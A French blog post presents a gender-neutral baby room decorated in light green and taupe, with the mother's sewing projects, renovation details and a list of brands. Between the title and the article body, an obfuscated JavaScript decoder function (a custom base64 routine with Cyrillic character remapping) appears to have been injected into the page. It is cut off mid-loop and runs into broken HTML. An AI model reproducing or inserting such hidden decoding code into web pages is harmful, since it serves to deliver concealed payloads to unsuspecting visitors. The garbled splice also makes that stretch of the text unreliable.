La chambre mixte d’Elisa

deco chambre mixte bebe

function h94fcba1e7(y1){var vd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb= »;var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6criptif »>Vous cherchez des idées déco pour une chambre mixte de bébé ? Oui mais comment aménager un petit nid douillet qui convienne aussi bien à une fille qu'à un garçon ?? C'est exactement la question que s'est posée la maman d'Elisa, auteure du blog Les Paris d'Emma,  avant d'imaginer une jolie chambre mixte dans les tons vert clair et taupe ! On vous laisse découvrir en images !

Présentation de la chambre mixte d'Elisa

Quand nous avons acheté notre appartement, cette chambre était très abîmée et nous avons dû entièrement la rénover : peinture murs et plafond, parquet, aménagement d'une alcôve, etc. Nous y avons mis tout notre cœur et beaucoup de notre temps pour créer un environnement douillet et accueillant pour notre bébé. La chambre a d'abord été imaginée pour un nourrisson, puis nous l'avons fait évoluer en même temps qu'Elisa. Autre contrainte, nous ne connaissions pas le sexe du bébé avant sa naissance, nous avons donc imaginé une chambre mixte.

Style de décoration de la chambre mixte d'Elisa

Couleurs : vert clair, taupe, blanc

Ambiance : douce

Nous voulions un style très doux. Nous avons opté pour des murs blancs avec des touches de couleur via la décoration. Comme nous ne connaissions pas le sexe, nous avons choisi de partir sur des tons vert clair et taupe.

Le blanc est venu moderniser la pièce, mais pour retrouver le côté "ancien" de l'appartement (style haussmannien), nous avons remis des moulures au plafond et installé un fauteuil ancien chiné sur le bon coin. Le fauteuil dans la chambre m'a servi à allaiter bébé et nous sert aujourd'hui pour les histoires du soir.

Les choix d'Emma, la maman d'Elisa

La tapisserie au fond de l'alcôve et les rideaux (tissu trouvé au Marché Saint Pierre) ont été le point de départ. Puis c'est la découverte de la collection de tissus « frou-frou » de la mercerie Moline (Paris 18e) qui m'a définitivement inspiré pour réaliser les éléments de décoration de la chambre. Je me suis lancée dans la couture, moi qui n'avait jamais utilisé de machine auparavant : coussins, pochons, petits fanions etc.

Pour le mobilier, nous avons utilisé l'ancien couffin du papa (le plus difficile a été de trouver des pieds de couffin adapté), dont l'habillage a été entièrement refait par une mamie bonne couturière et mon ancienne table à langer qui a été repeinte.

Enfin, pour la lampe, une simple boule japonaise customisée avec des étoiles en feutrine.

Une fois le sexe de bébé découvert, (une petite fille, nous étions ravis !), j'ai ajouté des touches un peu plus féminines à la décoration. Quand bébé a quitté son berceau pour un lit à barreaux, j'ai choisi un tour de lit liberty rose. Pour les jeux d'Elisa, nous avons ensuite installé un tapis puis des caisses à jouets. En ce moment, je confectionne un sac à jouets en tissu (toujours la collection frou-frou) pour ranger les nombreux joujoux de notre bébé.

Tout récemment, Elisa s'est vue offrir un petit bureau et une petite chaise pour ses dessins et ses dînettes.

Détails de la chambre mixte d'Elisa

Vous avez craqué sur des objets de la chambre mixte d'Elisa ? Voici le nom des marques pour les retrouver :

  • Tapisserie : www.papierspeintsdirect.com
  • Pieds de couffin : MAMAS AND PAPAS
  • Rideaux, coussins et créations couture : Frou-frou mercerie MOLINE
  • Tapis : SAINT MACLOU
  • Bureau et chaise : BAUDOU Paris
  • Lampe étoile : FLY
  • Coussins nuages : fait maison,  inspirés des créations de ZU
  • Guirlande lumineuse : LA CASE DU COUSIN PAUL
  • Affiche : L'affiche moderne
  • Boite à musique lapin : ZARA HOME
  • Boite à musique bois : TROUSSELIER

La chambre mixte d'Elisa vous aura peut-être donné des idées pour votre propre décoration. N’hésitez pas à aller voir les autres chambres partagées par les mamans ou à proposer la vôtre !

Présentation du blog d'Emma

paris-emmaParisienne d'adoption et maman débutante ! Depuis l'arrivée de baby girl on s'organise : des moments en solo, des moments en duo avec le papa et évidemment beaucoup de moments en trio ! Des bons plans, des avis, des idées, des tutos et tout ce qui me passe par la tête ... à bientôt sur mon blog !

Retrouvez l'univers d'Emma sur son blog : Les Paris d'Emma

Vous aussi, vous avez une jolie chambre enfant que vous souhaitez partager avec les autres mamans ?

Envoyez-nous les photos !

Continuons la lecture, par ici